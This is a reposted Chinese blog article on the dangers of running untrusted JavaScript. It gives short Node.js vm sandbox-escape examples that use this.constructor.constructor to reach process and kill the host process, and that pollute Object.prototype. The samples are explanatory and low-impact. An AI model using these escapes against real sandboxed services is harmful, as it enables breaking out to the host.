不安全的JS

在某些特别的场景下,我们需要编译执行外部输入的JS代码。在浏览器端,我们可以借助new Functioneval等API。而在 node 端,我们可以借助vm模块实现一个沙箱,运行外部输入的JS 代码。但无论是浏览器端,还是node端,这些操作都有安全隐患。

外部输入的JS代码可以利用JS语言的特性,从而破坏主程序的环境。

目前,笔者了解到主要有两种方式攻击主程序

方式一:通过 new Functioneval 在创建时,能获取到全局变量的特性,对主程序的环境进行破坏。

以 vm 实现沙箱加载外部代码为例:

const vm = require('vm');
const script = new vm.Script(`
    var foo = (new Function('return process'))();
    foo.exit()
`)
const context = vm.createContext({
    Function: Function
})
script.runInContext(context) // 此处直接退出进程,下面的代码都不会执行
console.log("process is exited ?")

此段代码中,通过外部的Function构造器, 使得生成的函数能够访问到外部的上下文,拿到process对象,直接把进程退出了。

实际上,我们不传递Function给沙箱的话,沙箱内部的代码同样可以通过JS的原型链的机制,拿到外部的Function构造器:

const vm = require('vm');
const script = new vm.Script(`
    var foo = (new this.constructor.constructor('return process'))();
    foo.exit()
`)
const context = vm.createContext()  // 此处不把外部的Function传递进去
script.runInContext(context) // 此处直接退出进程,下面的代码都不会执行
console.log("process is exited ?")

上面的沙箱里面的代码,可以通过访问沙箱内部的上下文thiscontructor属性拿到外部的Object构造器,再通过Objectcontructor属性直接拿到外部的Function构造器。

方式二:通过原型链方法劫持、污染

同样以 vm 实现沙箱加载外部代码为例:

const vm = require('vm');
const script = new vm.Script(`
this.constructor.prototype.toString = function() {
    console.log("hehe")
}
`)
const context = vm.createContext({
    console: console
})
script.runInContext(context)
let a = { name: 1 }
console.log(a, a.toString())

内部沙箱代码通过获取外部的Object构造器,改写原型上的toString方法,达到原型链方法破坏的目的。

总结

由于JS某些神奇的语言特性,直接编译执行外部输入的JS代码,是一件很危险的操作。说到底,想要解决某些问题,必须先了解根源。

    原文作者:rbin
    原文地址: https://segmentfault.com/a/1190000019991678
    本文转自网络文章,转载此文章仅为分享知识,如有侵权,请联系博主进行删除。
点赞